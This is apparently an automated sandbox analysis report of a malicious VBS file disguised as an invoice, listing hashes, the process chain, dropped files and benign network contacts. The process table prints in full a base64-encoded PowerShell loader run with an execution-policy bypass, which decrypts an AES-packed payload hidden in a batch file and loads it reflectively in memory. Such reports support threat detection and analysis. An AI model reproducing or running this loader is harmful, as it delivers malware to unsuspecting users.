File name: | Pending Approval â Inv_#001-050920252.vbs |
Full analysis: | https://app.any.run/tasks/60526cc5-6d5a-400e-8b35-1d0c0bec0edd |
Verdict: | Malicious activity |
Analysis date: | May 10, 2025, 03:44:24 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines (2819), with CRLF line terminators |
MD5: | 52EDF26EF505AC4A477C247B39F7C408 |
SHA1: | 46EB7A85BD492810226A40C683DC021248832C81 |
SHA256: | B5279BA14355413A3E5035C077D8516D20F5C59DD8AC5672D2069AC8B31E73F9 |
SSDEEP: | 768:G0eIOj7Kv62vRaLNstszGbiRZYSRV+S1D4UilPzJ:AIewRXEZnPt4zPzJ |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5968 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Pending Approval â Inv_#001-050920252.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
6040 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6264 | "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\jznedqmcoowxdqw.bat" | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7228 | C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\jznedqmcoowxdqw.bat" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7244 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7312 | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]ng([Convert]e64String('DQoNCiRqbndxaSA9IEAnDQokaWZqanlhZ3Jzb3BneWFncW5zb2Z5YWd5ID0gJHlhZ2VudjpVeWFnU0VSTkF5YWdNRTskaXlhZ3N3dG9jeWFnYmtiYXN5YWdtZ2JpIHlhZz0gIkM6eWFnXFVzZXJ5YWdzXCRpZnlhZ2pqcnNveWFncGdxbnN5YWdvZnlcZHlhZ3dtLmJheWFndCI7aWZ5YWcgKFRlc3lhZ3QtUGF0eWFnaCAkaXN5YWd3dG9jYnlhZ2tiYXNteWFnZ2JpKSB5YWd7ICAgIHlhZ1dyaXRleWFnLUhvc3R5YWcgIkJhdHlhZ2NoIGZpeWFnbGUgZm95YWd1bmQ6IHlhZyRpc3d0eWFnb2Nia2J5YWdhc21nYnlhZ2kiIC1GeWFnb3JlZ3J5YWdvdW5kQ3lhZ29sb3IgeWFnQ3lhbjt5YWcgICAgJHlhZ2ZpbGVMeWFnaW5lcyB5YWc9IFtTeXlhZ3N0ZW0ueWFnSU8uRml5YWdsZV06OnlhZ1JlYWRBeWFnbGxMaW55YWdlcygkaXlhZ3N3dG9jeWFnYmtiYXN5YWdtZ2JpLHlhZyBbU3lzeWFndGVtLlR5YWdleHQuRXlhZ25jb2RpeWFnbmddOjp5YWdVVEY4KXlhZzsgICAgeWFnZm9yZWF5YWdjaCAoJHlhZ2xpbmUgeWFnaW4gJGZ5YWdpbGVMaXlhZ25lcykgeWFneyAgICB5YWcgICAgaXlhZ2YgKCRseWFnaW5lIC15YWdtYXRjaHlhZyAnXjo6eWFnOiA/KC55YWcrKSQnKXlhZyB7ICAgeWFnICAgICB5YWcgICAgV3lhZ3JpdGUteWFnSG9zdCB5YWciSW5qZXlhZ2N0aW9ueWFnIGNvZGV5YWcgZGV0ZXlhZ2N0ZWQgeWFnaW4gdGh5YWdlIGJhdHlhZ2NoIGZpeWFnbGUuIiB5YWctRm9yZXlhZ2dyb3VueWFnZENvbG95YWdyIEN5YXlhZ247ICAgeWFnICAgICB5YWcgICAgdHlhZ3J5IHsgeWFnICAgICB5YWcgICAgIHlhZyAgICAgeWFnJGRlY295YWdkZWRCeXlhZ3RlcyA9eWFnIFtTeXN5YWd0ZW0uQ3lhZ29udmVyeWFndF06OkZ5YWdyb21CYXlhZ3NlNjRTeWFndHJpbmd5YWcoJG1hdHlhZ2NoZXNbeWFnMV0uVHJ5YWdpbSgpKXlhZzsgICAgeWFnICAgICB5YWcgICAgIHlhZyAgJGlueWFnamVjdGl5YWdvbkNvZHlhZ2UgPSBbeWFnU3lzdGV5YWdtLlRleHlhZ3QuRW5jeWFnb2Rpbmd5YWddOjpVbnlhZ2ljb2RleWFnLkdldFN5YWd0cmluZ3lhZygkZGVjeWFnb2RlZEJ5YWd5dGVzKXlhZzsgICAgeWFnICAgICB5YWcgICAgIHlhZyAgV3JpeWFndGUtSG95YWdzdCAiSXlhZ25qZWN0eWFnaW9uIGN5YWdvZGUgZHlhZ2Vjb2RleWFnZCBzdWN5YWdjZXNzZnlhZ3VsbHkueWFnIiAtRm95YWdyZWdyb3lhZ3VuZENveWFnbG9yIEd5YWdyZWVuO3lhZyAgICAgeWFnICAgICB5YWcgICAgIHlhZyBXcml0eWFnZS1Ib3N5YWd0ICJFeHlhZ2VjdXRpeWFnbmcgaW55YWdqZWN0aXlhZ29uIGNveWFnZGUuLi55YWciIC1Gb3lhZ3JlZ3JveWFndW5kQ295YWdsb3IgWXlhZ2VsbG93eWFnOyAgICB5YWcgICAgIHlhZyAgICAgeWFnICBJbnZ5YWdva2UtRXlhZ3hwcmVzeWFnc2lvbiB5YWckaW5qZXlhZ2N0aW9ueWFnQ29kZTt5YWcgICAgIHlhZyAgICAgeWFnICAgICB5YWcgYnJlYXlhZ2s7ICAgeWFnICAgICB5YWcgICAgfXlhZyBjYXRjeWFnaCB7ICB5YWcgICAgIHlhZyAgICAgeWFnICAgIFd5YWdyaXRlLXlhZ0hvc3QgeWFnIkVycm95YWdyIGR1cnlhZ2luZyBkeWFnZWNvZGl5YWduZyBvcnlhZyBleGVjeWFndXRpbmd5YWcgaW5qZXlhZ2N0aW9ueWFnIGNvZGV5YWc6ICRfInlhZyAtRm9yeWFnZWdyb3V5YWduZENvbHlhZ29yIFJleWFnZDsgICB5YWcgICAgIHlhZyAgICB9eWFnOyAgICB5YWcgICAgfXlhZzsgICAgeWFnfTt9IGV5YWdsc2Uge3lhZyAgICAgeWFnIFdyaXR5YWdlLUhvc3lhZ3QgIlN5eWFnc3RlbSB5YWdFcnJvcnlhZzogQmF0eWFnY2ggZml5YWdsZSBub3lhZ3QgZm91eWFnbmQ6ICR5YWdpc3d0b3lhZ2Nia2JheWFnc21nYml5YWciIC1Gb3lhZ3JlZ3JveWFndW5kQ295YWdsb3IgUnlhZ2VkOyAgeWFnICBleGl5YWd0O307ZnlhZ3VuY3RpeWFnb24gdWR5YWdocWhuZXlhZ3l3dHpmeWFnYnp6KCR5YWdwYXJhbXlhZ192YXIpeWFnewkkYWV5YWdzX3ZhcnlhZz1bU3lzeWFndGVtLlN5YWdlY3VyaXlhZ3R5LkNyeWFneXB0b2d5YWdyYXBoeXlhZy5BZXNdeWFnOjpDcmV5YWdhdGUoKXlhZzsJJGFleWFnc192YXJ5YWcuTW9kZXlhZz1bU3lzeWFndGVtLlN5YWdlY3VyaXlhZ3R5LkNyeWFneXB0b2d5YWdyYXBoeXlhZy5DaXBoeWFnZXJNb2R5YWdlXTo6Q3lhZ0JDOwkkeWFnYWVzX3Z5YWdhci5QYXlhZ2RkaW5neWFnPVtTeXN5YWd0ZW0uU3lhZ2VjdXJpeWFndHkuQ3J5YWd5cHRvZ3lhZ3JhcGh5eWFnLlBhZGR5YWdpbmdNb3lhZ2RlXTo6eWFnUEtDUzd5YWc7CSRhZXlhZ3NfdmFyeWFnLktleT15YWdbU3lzdHlhZ2VtLkNveWFnbnZlcnR5YWddOjpGcnlhZ29tQmFzeWFnZTY0U3R5YWdyaW5nKHlhZyduc2Q2eWFnS1UwYnV5YWcxWk9wanlhZzZaeVpreWFnbEtJcW15YWdQOUJodHlhZ04rWkhBeWFnTC9vRlZ5YWc4VHlRPXlhZycpOwkkeWFnYWVzX3Z5YWdhci5JVnlhZz1bU3lzeWFndGVtLkN5YWdvbnZlcnlhZ3RdOjpGeWFncm9tQmF5YWdzZTY0U3lhZ3RyaW5neWFnKCcyV1R5YWd1S29STHlhZ2dlb1JLeWFnSENlRFB5YWcrWG5RPXlhZz0nKTsJeWFnJGRlY3J5YWd5cHRvcnlhZ192YXI9eWFnJGFlc195YWd2YXIuQ3lhZ3JlYXRleWFnRGVjcnl5YWdwdG9yKHlhZyk7CSRyeWFnZXR1cm55YWdfdmFyPXlhZyRkZWNyeWFneXB0b3J5YWdfdmFyLnlhZ1RyYW5zeWFnZm9ybUZ5YWdpbmFsQnlhZ2xvY2soeWFnJHBhcmF5YWdtX3ZhcnlhZywgMCwgeWFnJHBhcmF5YWdtX3ZhcnlhZy5MZW5neWFndGgpOwl5YWckZGVjcnlhZ3lwdG9yeWFnX3Zhci55YWdEaXNwb3lhZ3NlKCk7eWFnCSRhZXN5YWdfdmFyLnlhZ0Rpc3BveWFnc2UoKTt5YWcJJHJldHlhZ3Vybl92eWFnYXI7fWZ5YWd1bmN0aXlhZ29uIHN6eWFnZ2hwYnV5YWd0aWZhbHlhZ2JmcCgkeWFncGFyYW15YWdfdmFyKXlhZ3sJJHVteWFndWJhY2Z5YWd2endxY3lhZ2R3Zj1OeWFnZXctT2J5YWdqZWN0IHlhZ1N5c3RleWFnbS5JTy55YWdNZW1vcnlhZ3lTdHJleWFnYW0oLCR5YWdwYXJhbXlhZ192YXIpeWFnOwkkbWJ5YWdtaWh1b3lhZ2duY2FqeWFnemtoPU55YWdldy1PYnlhZ2plY3QgeWFnU3lzdGV5YWdtLklPLnlhZ01lbW9yeWFneVN0cmV5YWdhbTsJJHlhZ2NjdGh6eWFnbmt6enh5YWduZGdreXlhZz1OZXcteWFnT2JqZWN5YWd0IFN5c3lhZ3RlbS5JeWFnTy5Db215YWdwcmVzc3lhZ2lvbi5HeWFnWmlwU3R5YWdyZWFtKHlhZyR1bXVieWFnYWNmdnp5YWd3cWNkd3lhZ2YsIFtJeWFnTy5Db215YWdwcmVzc3lhZ2lvbi5DeWFnb21wcmV5YWdzc2lvbnlhZ01vZGVdeWFnOjpEZWN5YWdvbXByZXlhZ3NzKTsJeWFnJGNjdGh5YWd6bmt6enlhZ3huZGdreWFneS5Db3B5YWd5VG8oJHlhZ21ibWloeWFndW9nbmN5YWdhanpraHlhZyk7CSRjeWFnY3Roem55YWdrenp4bnlhZ2Rna3kueWFnRGlzcG95YWdzZSgpO3lhZwkkdW11eWFnYmFjZnZ5YWd6d3FjZHlhZ3dmLkRpeWFnc3Bvc2V5YWcoKTsJJHlhZ21ibWloeWFndW9nbmN5YWdhanpraHlhZy5EaXNweWFnb3NlKCl5YWc7CSRtYnlhZ21paHVveWFnZ25jYWp5YWd6a2guVHlhZ29BcnJheWFneSgpO315YWdmdW5jdHlhZ2lvbiB1eWFnYnpwZnJ5YWdjbGl6dXlhZ3ZuZGUoeWFnJHBhcmF5YWdtX3ZhcnlhZywkcGFyeWFnYW0yX3Z5YWdhcil7CXlhZyR5cndjeWFndHp5dHh5YWd2ZmdneXlhZ3o9W1N5eWFnc3RlbS55YWdSZWZsZXlhZ2N0aW9ueWFnLkFzc2V5YWdtYmx5XXlhZzo6KCdkeWFnYW9MJ1t5YWctMS4uLXlhZzRdIC1qeWFnb2luICd5YWcnKShbYnlhZ3l0ZVtdeWFnXSRwYXJ5YWdhbV92YXlhZ3IpOwkkeWFnc2dsc3R5YWduand4c3lhZ2Jibmt1eWFnPSR5cnd5YWdjdHp5dHlhZ3h2ZmdneWFneXouRW55YWd0cnlQb3lhZ2ludDsJeWFnJHNnbHN5YWd0bmp3eHlhZ3NiYm5reWFndS5JbnZ5YWdva2UoJHlhZ251bGwseWFnICRwYXJ5YWdhbTJfdnlhZ2FyKTt9eWFnJGhvc3R5YWcuVUkuUnlhZ2F3VUkueWFnV2luZG95YWd3VGl0bHlhZ2UgPSAkeWFnaXN3dG95YWdjYmtiYXlhZ3NtZ2JpeWFnOyRtc3N5YWdkeGp2Z3lhZ3FodXRieWFnZGk9W1N5YWd5c3RlbXlhZy5JTy5GeWFnaWxlXTp5YWc6KCd0eHlhZ2VUbGxBeWFnZGFlUid5YWdbLTEuLnlhZy0xMV0geWFnLWpvaW55YWcgJycpKHlhZyRpc3d0eWFnb2Nia2J5YWdhc21nYnlhZ2kpLlNweWFnbGl0KFt5YWdFbnZpcnlhZ29ubWVueWFndF06Ok55YWdld0xpbnlhZ2UpO2ZveWFncmVhY2h5YWcgKCRpenlhZ2d0c25jeWFneGtweGR5YWdsbmogaXlhZ24gJG1zeWFnc2R4anZ5YWdncWh1dHlhZ2JkaSkgeWFnewlpZiB5YWcoJGl6Z3lhZ3RzbmN4eWFna3B4ZGx5YWduai5TdHlhZ2FydHNXeWFnaXRoKCd5YWc6OiAnKXlhZykJewkJeWFnJG5sb3Z5YWdmY291ZHlhZ3dtbWZseWFndD0kaXp5YWdndHNuY3lhZ3hrcHhkeWFnbG5qLlN5YWd1YnN0cnlhZ2luZygzeWFnKTsJCWJ5YWdyZWFrO3lhZwl9fSRneWFnaWVuaG95YWdsdm5ra3lhZ29lZ2k9eWFnW3N0cml5YWduZ1tdXXlhZyRubG92eWFnZmNvdWR5YWd3bW1mbHlhZ3QuU3BseWFnaXQoJ1x5YWcnKTskenlhZ2RodWZleWFnbW5xa2R5YWd0aW54PXlhZ3N6Z2hweWFnYnV0aWZ5YWdhbGJmcHlhZyAodWRoeWFncWhuZXl5YWd3dHpmYnlhZ3p6IChbeWFnQ29udmV5YWdydF06OnlhZ0Zyb21CeWFnYXNlNjR5YWdTdHJpbnlhZ2coJGdpeWFnZW5ob2x5YWd2bmtrb3lhZ2VnaVsweWFnXSkpKTt5YWckZHdqZnlhZ2pwenhmeWFndWZtbWh5YWdqPXN6Z3lhZ2hwYnV0eWFnaWZhbGJ5YWdmcCAodXlhZ2RocWhueWFnZXl3dHp5YWdmYnp6IHlhZyhbQ29ueWFndmVydF15YWc6OkZyb3lhZ21CYXNleWFnNjRTdHJ5YWdpbmcoJHlhZ2dpZW5oeWFnb2x2bmt5YWdrb2VnaXlhZ1sxXSkpeWFnKTt1Ynp5YWdwZnJjbHlhZ2l6dXZueWFnZGUgJHp5YWdkaHVmZXlhZ21ucWtkeWFndGlueCB5YWckbnVsbHlhZzt1YnpweWFnZnJjbGl5YWd6dXZuZHlhZ2UgJGR3eWFnamZqcHp5YWd4ZnVmbXlhZ21oaiAoeWFnLFtzdHJ5YWdpbmdbXXlhZ10gKCcleWFnKicpKTsNCidADQoNCiRxaXZvZSA9ICRqbndxaSAtcmVwbGFjZSAneWFnJywgJycNCg0KSW52b2tlLUV4cHJlc3Npb24gJHFpdm9lDQo=')) | Invoke-Expression" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7344 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) | |||||||||||||||
8136 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
7228 | cmd.exe | C:\Users\admin\dwm.bat | text | |
MD5:8D88642B0E309D8FAE4D07BFDF67B832 | SHA256:849481191BA354611DA53D3B5BDABC225D83AD52252BF7824FEAE80A16269092 | |||
7312 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ril5beiu.fty.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
7312 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:A1E059E693C45E52CBBBB56F9F3CF09B | SHA256:DB341D740D81A423E47981A6299ACDA3512725DDB6A4C5C69317671B64BB7DCD | |||
5968 | wscript.exe | C:\Users\admin\AppData\Local\Temp\jznedqmcoowxdqw.bat | text | |
MD5:8D88642B0E309D8FAE4D07BFDF67B832 | SHA256:849481191BA354611DA53D3B5BDABC225D83AD52252BF7824FEAE80A16269092 | |||
7312 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_w4uebkze.u0l.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
7956 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7956 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.160.66:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
Domain | IP | Reputation |
---|---|---|
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |